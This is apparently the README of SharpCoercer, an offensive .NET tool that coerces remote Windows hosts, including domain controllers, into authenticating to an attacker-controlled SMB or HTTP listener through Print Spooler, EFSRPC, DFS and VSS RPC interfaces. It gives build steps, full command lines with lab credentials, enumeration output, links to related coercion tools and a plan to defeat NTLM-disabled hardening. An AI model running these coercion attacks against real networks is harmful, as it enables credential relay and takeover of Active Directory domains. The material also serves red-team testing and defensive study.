SharpCoercer is a .NET Framework 4.8 tool, that triggers authentication attempts from remote Windows hosts via RPC-based coercion techniques. It supports both SMB- and HTTP-based coercion, allowing you to redirect a target host’s authentication flow to a listener you control.
- Protocol Coercion: SMB and HTTP transport for authentication relay.
- Port Customization: Specify non-default SMB (445) and HTTP (80) ports.
- Discovery & Filtering:
- List available RPC clients and named pipes.
- Enumerate RPC methods per client.
- Filter by RPC client name, method name, or pipe name.
- Flexible Invocation:
- Single-run or unattended (
-always-continue) modes. - Optional domain credentials or current user token.
- Single-run or unattended (
- Extensible Architecture:
- Add new RPC clients by implementing the
IRpcClientinterface.
- Add new RPC clients by implementing the
- Clone the repository:
git clone https://github.com/your-org/SharpCoercer.git cd SharpCoercer - Build with Visual Studio (targeting .NET Framework 4.8) or via MSBuild:
msbuild /p:Configuration=Release SharpCoercer.sln
- The compiled executable will be located in
bin/Release.
SharpCoercer.exe -t <target> -l <listener> [options]
| Switch | Description |
|---|---|
-t, -target |
Remote host to coerce (IP address or DNS name). |
-l, -listener |
Your SMB share or HTTP listener (IP address or DNS). |
| Switch | Description | |
|---|---|---|
-a, -auth-type |
Coercion transport smb or http coercion (default: smb) |
|
-sp, -smb-port <port> |
SMB port (default: 445). |
|
-hp, -http-port <port> |
HTTP port (default: 80). |
|
-d, -domain <domain> |
Domain name for supplied credentials. | |
-u, -username <user> |
Username for RPC binding. | |
-p, -password <pass> |
Password for RPC binding. | |
-np, -namedpipe-filter <n> |
Filter named pipes by substring. | |
-r, -rpc-filter <n> |
Filter RPC client classes by substring. | |
-m, -method-filter <n> |
Filter RPC methods by substring. | |
-lr, -listrpcs |
List all available RPC clients and exit. | |
-lp, -listPipes |
List all available named pipes and exit. | |
-lf, -listfunctions |
List all RPC methods (with optional -r filter) and exit. |
|
-c, -always-continue |
Skip interactive prompts between calls. | |
-e, -enumerate |
Enumerate all available named pipes on the target and attempt to bind to each one. |
# Coerce via SMB (default) using domain credentials
SharpCoercer.exe -t 192.168.1.10 -l 192.168.1.20 \
-d CORP -u Administrator -p "P@ssw0rd"
# Coerce via HTTP listener on custom port
SharpCoercer.exe -t dc1.corp.local -l mylistener.example.com \
-a http -hp 8080 -c
# Enumerate RPC methods for the MS-RPRN client
SharpCoercer.exe -lr -r RprnRpcClient -lf.\SharpCoercer.exe -t dc.hecker.local -u adam -p Temp123 -d hecker.local -l 192.168.163.129 -csmb.mp4
.\SharpCoercer.exe -t dc.hecker.local -u adam -p Temp123 -d hecker.local -l 192.168.163.129 -c -a http- Web Client must be enabled on the target machine
- WebDAV authentication only works if the domain name can be resolved via DNS or NetBIOS. You can’t coerce HTTP authentication unless you have NetBIOS name resolution or you’ve created a DNS record in Active Directory DNS
http.mp4
| Interface | Named Pipe | Description |
|---|---|---|
RprnRpcClient |
\PIPE\spoolss |
MS-RPRN (Print Spooler) |
FsrvpRpcClient |
\PIPE\winsvr |
MS-FSRVP (File Server VSS) |
DfsmRpcClient |
\PIPE\dfsnm |
MS-DFSNM (DFS Namespace Management) |
EfsRpcClient |
\PIPE\lsarpc |
EFSRPC (Encrypting File System) |
.\SharpCoercer.exe -lf
[MS-DFSNM] (An RPC interface through which clients remotely configure and manage DFS namespaces)
- NetrDfsRemoveStdRoot
- NetrDfsAddStdRoot
[MS-EFSR] (RPC-based protocol for remote maintenance of encrypted network file data.)
- EfsRpcAddUsersToFile
- EfsRpcEncryptFileSrv
- EfsRpcDecryptFileSrv
- EfsRpcQueryRecoveryAgents
- EfsRpcQueryUsersOnFile
- EfsRpcRemoveUsersFromFile
- EfsRpcFileKeyInfo
- EfsRpcOpenFileRaw
- EfsRpcDuplicateEncryptionInfoFile
- EfsRpcAddUsersToFileEx
[MS-FSRVP] (The File Server Remote VSS Protocol (FSRVP) is an RPC-based service for creating application-consistent shadow copies of remote file shares.)
- IsPathSupported
- IsPathShadowCopied
[MS-RPRN] (RPC-based protocol for synchronous printing, spooling, and print job management.)
- RpcRemoteFindFirstPrinterChangeNotificationEx
.\SharpCoercer.exe -lpAvailable Pipes:
- \pipe\netdfs
- \pipe\netlogon
- \pipe\efsrpc
- \pipe\fssagentrpc
- \pipe\spoolss
- \pipe\lsarpc
- \pipe\lsass
- \pipe\samr
.\SharpCoercer.exe -lrAvailable RPC Clients:
- MS-DFSNM
- MS-EFSR
- MS-FSRVP
- MS-RPRN
.\SharpCoercer.exe -e -t 192.168.163.128 -u adam -p Temp123 -d hecker[+] Using auth-type: SMB, SMB port: 445, HTTP port: 80
[+] Using credentials: hecker\adam:Temp123
[+] Connected to \\192.168.163.128\IPC$ as hecker\adam
== MS-DFSNM ==
[+] Found pipe \pipe\netdfs on 192.168.163.128
Binding to 192.168.163.128 \pipe\netdfs
binding ok (handle=2305824077904)
== MS-EFSR ==
[+] Found pipe \pipe\netlogon on 192.168.163.128
Binding to 192.168.163.128 \pipe\netlogon
binding ok (handle=2305824085616)
== MS-EFSR ==
[-] Pipe \PIPE\efsrpc missing on 192.168.163.128, skipping
== MS-FSRVP ==
[+] Found pipe \pipe\FssagentRpc on 192.168.163.128
Binding to 192.168.163.128 \pipe\FssagentRpc
binding ok (handle=2305824134848)
== MS-RPRN ==
[+] Found pipe \pipe\spoolss on 192.168.163.128
== MS-EFSR ==
[+] Found pipe \pipe\lsarpc on 192.168.163.128
Binding to 192.168.163.128 \pipe\lsarpc
binding ok (handle=2305824135248)
== MS-EFSR ==
[+] Found pipe \PIPE\lsass on 192.168.163.128
Binding to 192.168.163.128 \PIPE\lsass
binding ok (handle=2305824135648)
== MS-EFSR ==
[+] Found pipe \PIPE\samr on 192.168.163.128
Binding to 192.168.163.128 \PIPE\samr
binding ok (handle=2305824136048)
- MITM and Coerced Authentications
https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/
A deep-dive tutorial covering NTLM relay, SMB/HTTP coercion, and advanced RPC-based authentication coercion techniques.
https://github.com/cube0x0/SharpSystemTriggers
C# tool to trigger Windows system services (e.g., Print Spooler, Certificate Authority) via HTTP requests, causing remote hosts to authenticate back to an attacker-controlled listener.
https://github.com/topotam/PetitPotam
Python implementation of the EFSRPC protocol methods (excluding patched ones) to coerce a target into sending NTLM authentication to a remote SMB or HTTP listener.
https://github.com/leechristensen/SpoolSample
Minimal C# proof-of-concept demonstrating how to invoke the MS-RPRN (Print Spooler) RPC interface to force authentication over SMB or HTTP.
https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
Python script in the Kerberos relay toolkit that abuses the Print Spooler (MS-RPRN) to capture Kerberos tickets and/or relay authentication to other services.
https://github.com/ShutdownRepo/ShadowCoerce
C# and Python payloads to exploit unpatched EFSRPC methods for NTLM coercion, similar to PetitPotam but with additional automation and payload flexibility.
https://github.com/Wh04m1001/DFSCoerce
C# tool targeting the MS-DFSNM (DFS Namespace Management) RPC interface, coercing remote hosts to authenticate to a specified SMB/HTTP listener via DFS calls.
-
x64 Only
The tool is only supported on 64-bit (x86_64) systems. It will not run on 32-bit architectures. -
NTLM-Disabled Environments
On systems where NTLM authentication has been disabled (for example via Group Policy), it is not possible to coerce authentication over SMB/HTTP from remote, non–domain-joined machines.
-
x86 Support
Add compatibility for 32-bit Windows hosts. -
Alternative Coercion Methods
Research and implement Kerberos-based or other non-NTLM coercion techniques. -
Hardened Systems
Develop fallback mechanisms or detection routines to enable coercion in environments with NTLM turned off.
Pull requests are welcome. Feel free to open an issue if you want to add other features.
- @tifkin_ and @elad_shamir for finding and implementing PrinterBug on MS-RPRN
- @topotam77 for finding and implementing PetitPotam on MS-EFSR
- @topotam77 for finding and @_nwodtuhs for implementing ShadowCoerce on MS-FSRVP
- @filip_dragovic for finding and implementing DFSCoerce on MS-DFSNM
- @evilashz for finding and implementing CheeseOunce on MS-EVEN